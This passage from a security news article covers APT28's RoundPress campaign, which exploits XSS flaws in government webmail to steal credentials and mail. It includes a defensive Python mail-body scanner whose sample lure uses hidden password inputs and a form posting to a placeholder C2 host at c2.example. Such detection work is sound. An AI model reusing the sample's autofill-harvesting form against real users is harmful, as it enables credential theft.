Ethical Hacking News
In a significant escalation of global cyber espionage, APT28's "RoundPress" operation has exposed high-value government email credentials through targeted webmail vulnerabilities. Understanding how the campaign works is essential for anyone responsible for protecting sensitive mail systems.
* APT28 (Fancy Bear/Sednit) hackers have targeted government webmail in a significant escalation of global cyber espionage.
* The operation, dubbed "RoundPress," uses zero-day and n-day flaws to steal sensitive email information from high-value government organizations worldwide.
* Attackers use spear-phishing emails referencing current news or political events to add legitimacy and exploit XSS vulnerabilities in webmail browsers.
* The stolen data is exfiltrated using HTTP POST requests to hardcoded C2 addresses.
* The RoundPress campaign targets multiple XSS flaws in various webmail products, including Roundcube, MDaemon, Horde, and Zimbra.
* ESET researchers attribute the operation with medium confidence to APT28, a state-sponsored hacking group.
* The operation highlights the critical vulnerabilities in widely used webmail systems and underscores the need for enhanced security measures.
In a significant escalation of global cyber espionage, government webmail has been targeted by hackers operating under the banner of APT28, also known as "Fancy Bear" or "Sednit." The operation, dubbed "RoundPress," has been identified as an ongoing campaign leveraging zero-day and n-day flaws in popular webmail servers to steal sensitive email information from high-value government organizations worldwide.
According to the ESET researchers who uncovered the operation, RoundPress is characterized by its use of spear-phishing emails referencing current news or political events to add legitimacy. These emails carry malicious JavaScript payloads embedded in the HTML body, which trigger cross-site scripting (XSS) vulnerabilities in the webmail clients the recipients use in their browsers. The exploit requires no interaction beyond opening the email; the payload runs automatically as soon as the message is rendered.
The attackers' payloads are designed to capture credentials by tricking the victim's browser into autofilling stored email-account logins into invisible input fields, or by sending HTTP requests from the webmail session to collect email message content, contacts, webmail settings, login history, two-factor authentication information, and passwords. The stolen data is then exfiltrated to hardcoded command-and-control (C2) addresses using HTTP POST requests.
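The two indicators described above (JavaScript embedded in an HTML mail body, and CSS-invisible input fields that bait browser autofill, together with a form posting off-site) can be checked for at the mail gateway before a message reaches a webmail client. The following scanner is an added example, not code from ESET or from the article; the sample message and the `c2.example` host are constructed placeholders.

```python
"""Flag HTML email bodies that carry inline JavaScript, invisible
credential-style inputs (autofill bait) or forms posting to an external host."""
from html.parser import HTMLParser
import re

# CSS that hides an element from the reader while keeping it in the DOM.
_INVISIBLE = re.compile(
    r"display\s*:\s*none|visibility\s*:\s*hidden|opacity\s*:\s*0(?![.\d])", re.I)
_CRED_FIELD = ("password", "text", "email")   # field types a password manager fills


class MailBodyScanner(HTMLParser):
    """Collects one finding string per suspicious construct."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "script":
            self.findings.append("inline <script>")
        for k, v in a.items():
            if k.startswith("on"):               # onload=, onerror=, onmouseover=, ...
                self.findings.append(f"event handler {k} on <{tag}>")
            if k in ("href", "src", "action") and v.strip().lower().startswith("javascript:"):
                self.findings.append(f"javascript: URI in <{tag} {k}>")
        if tag == "input" and a.get("type", "text").lower() in _CRED_FIELD \
                and _INVISIBLE.search(a.get("style", "")):
            self.findings.append(
                f"invisible {a.get('type', 'text')} input '{a.get('name', '?')}' (autofill bait)")
        if tag == "form" and re.match(r"https?://", a.get("action", ""), re.I):
            self.findings.append(f"form posting to external host {a['action']}")


def scan_mail_body(html: str) -> list:
    """Return the findings for one HTML email body (empty list = nothing flagged)."""
    s = MailBodyScanner()
    s.feed(html)
    s.close()
    return s.findings


# Constructed sample: a newsy lure carrying all three indicator types.
SAMPLE_BODY = """<html><body>
<p>Latest update on the summit negotiations.</p>
<img src="x" onerror="run()">
<form action="https://c2.example/collect" method="post">
  <input type="text" name="user" style="opacity:0;position:absolute">
  <input type="password" name="pass" style="display:none">
</form>
</body></html>"""

if __name__ == "__main__":
    for f in scan_mail_body(SAMPLE_BODY):
        print("FLAG:", f)
```

The regexes are deliberately narrow; a production filter would also strip or neutralise the flagged constructs rather than only reporting them.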
The RoundPress campaign targets multiple XSS flaws in various webmail products commonly used by important organizations, including Roundcube, MDaemon, Horde, and Zimbra. ESET researchers have documented the specific vulnerabilities exploited, beginning in early 2023 and evolving throughout 2024:
* Roundcube: Two XSS vulnerabilities were identified - CVE-2020-35730 (used in 2023) and CVE-2023-43770 (targeted in early 2024). The first vulnerability allowed hackers to inject malicious JavaScript directly into the body of an email, while the second exploited how Roundcube handled hyperlink text by leveraging improper sanitization, enabling attackers to inject